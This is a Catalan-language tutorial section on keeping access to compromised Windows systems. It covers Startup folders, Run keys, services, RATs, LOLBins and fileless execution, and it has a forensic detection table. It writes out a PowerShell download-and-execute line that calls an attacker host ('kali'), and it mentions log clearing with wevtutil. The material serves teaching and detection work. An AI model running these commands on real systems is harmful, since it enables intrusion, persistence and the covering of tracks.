Persistències i Backdoors
The Eternal Ghost
Garantint el manteniment de l'accés en sistemes compromesos
SECCIÓ 3: Persistències i Portes del Darrere
Un cop compromès el sistema, l'atacant ha d'assegurar-se que no perdrà l'accés si l'usuari reinicia l'ordinador, tanca la sessió o canvia la contrasenya. Aquest conjunt de tècniques s'anomena Persistència.
🔑 El concepte de Persistència
Mantenir el control requereix mecanismes que s'auto-executin. L'objectiu és trobar un equilibri entre la visibilitat (ser fàcil de detectar per un administrador) i la robustesa (resistir a neteges del sistema).
3.1 Tècniques de Persistència Tradicionals
Es basen a utilitzar funcionalitats legítimes de Windows per carregar codi maliciós en l'arrencada:
Carpeta Startup
Col·locar scripts a \AppData\Roaming\...\Startup. Senzill però fàcil de
detectar.
Registre Autorun
Claus Run a HKCU o HKLM que executen programes al
iniciar sessió.
Serveis de Windows
Crear serveis (sc create) amb inici automàtic per rebre shells com a SYSTEM.
👻 3.2 Portes del Darrere: RAT (Remote Access Trojans)
Un RAT és un programari maliciós que permet el control remot total d'un sistema.
RAT vs. RAT: Eines legítimes vs Malicioses
La diferència entre una eina d'administració (PsExec, TeamViewer) i un troià (NjRAT, RemcosRAT) és la intenció i el consentiment.
Funcionalitats: Keyloggers, captura de pantalla, control de càmera i el famós Watchdog (procés que reinicia l'implant si es tanca).
🚀 3.3 LOLBins i Atacs Fileless (Malware sense fitxers)
Per evitar els antivirus que busquen fitxers .exe, s'utilitzen
LOLBins (Living Off the Land Binaries): eines legítimes del propi sistema.
Exfiltració i Beaconing
curl: Utilitzar la comanda nativa per enviar dades sensibles capturades cap a l'exterior.
Beaconing (C2): Tasques programades (schtasks) que "truquen
a casa" per rebre ordres, imitant el trànsit web normal.
Execució en memòria (PowerShell)
Descarregar i executar codi directament a la RAM sense tocar el disc dur:
powershell -Command "IEX(New-Object Net.WebClient).DownloadString('http://kali/payload.ps1')"
⚖️ Anàlisi de Detecció Forense
| Mètode | Detecció | Rastre Forense |
|---|---|---|
| Servei (SC) | Alta | Clau a HKLM\...\Services |
| Tasca Programada | Mitjana | Artefactes a C:\Windows\System32\Tasks |
| Fileless (RAM) | Baixa | Logs de PowerShell |
| Timestomping | Molt Baixa | Falsificació de metadades de temps |
Info Callout: L'Event 1102 i el Crit del Silenci
Esborrar els logs amb wevtutil cl Security sembla bona idea, però genera
automàticament l'Event ID 1102. Per al Blue Team, aquest esdeveniment és
una alarma vermella: algú està intentant amagar les seves petjades.
🗂️ Resum de la Secció 3
Mantenir l'accés permanent al sistema.
Registre Run, Tasques Programades, Serveis i C2.
Ús de LOLBins (curl, powershell) i Fileless Malware.